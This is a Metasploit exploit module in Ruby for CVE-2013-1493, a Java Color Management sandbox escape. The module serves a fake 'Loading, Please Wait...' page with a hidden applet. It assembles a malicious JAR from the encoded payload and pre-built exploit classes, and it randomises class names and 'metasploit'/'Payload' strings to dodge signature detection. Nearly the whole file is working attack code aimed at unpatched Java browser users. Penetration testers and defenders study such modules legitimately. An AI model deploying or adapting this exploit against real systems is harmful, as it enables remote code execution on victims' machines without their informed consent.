##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
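require 'msf/core'
require 'rex'

# Browser-side module for CVE-2013-1493 (Java CMM). It serves an HTML page
# carrying an <applet> tag and, on request, a JAR assembled from the encoded
# payload plus four pre-built class files shipped under
# data/exploits/cve-2013-1493. Note that the module relies on the user
# accepting the Java click-to-play warning (see the Description).
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  # Registers the module metadata (name, references, payload constraints,
  # targets). The 'DefaultTarget' index refers to the 'Targets' array below.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four pre-built class files into instance variables and picks a
  # random name for the Init class before handing control to the HTTP server
  # setup in the superclass.
  #
  # @raise [Errno::ENOENT] if one of the class files is missing from the
  #   framework's data directory
  def setup
    @init_class           = read_class_file('Init.class')
    @leak_class           = read_class_file('Leak.class')
    @buffered_image_class = read_class_file('MyBufferedImage.class')
    @color_space_class    = read_class_file('MyColorSpace.class')

    # The replacement name has exactly the same length as "Init" so the
    # byte-level substitution in the class file does not change its size
    # (presumably keeping the class-file constant pool consistent).
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # Dispatches on the requested URI:
  #   * paths ending in .jar  -> the assembled applet JAR
  #   * paths ending in /     -> the HTML page with the <applet> tag
  #   * anything else         -> redirect to the resource root
  #
  # @param cli [Rex::Socket] the client connection
  # @param request [Rex::Proto::Http::Request] the parsed HTTP request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # Use a distinct local name: a local called `payload` would shadow the
      # `payload` mixin method for the rest of the method body.
      fresh_payload = regenerate_payload(cli)
      unless fresh_payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the minimal HTML page whose <applet> tag points at a randomly named
  # .jar and at the randomized Init class chosen in #setup.
  #
  # @return [String] the HTML document
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one of the pre-built class files shipped with the framework.
  #
  # @param name [String] file name inside data/exploits/cve-2013-1493
  # @return [String] the raw (binary) file contents
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Assembles the applet JAR: the encoded payload JAR plus the four class
  # files, with the literal "metasploit"/"Payload" markers in entry names and
  # entry data replaced by random same-length strings.
  #
  # @return [Rex::Zip::Jar] the JAR with its manifest built
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)

    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str).gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end
end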
|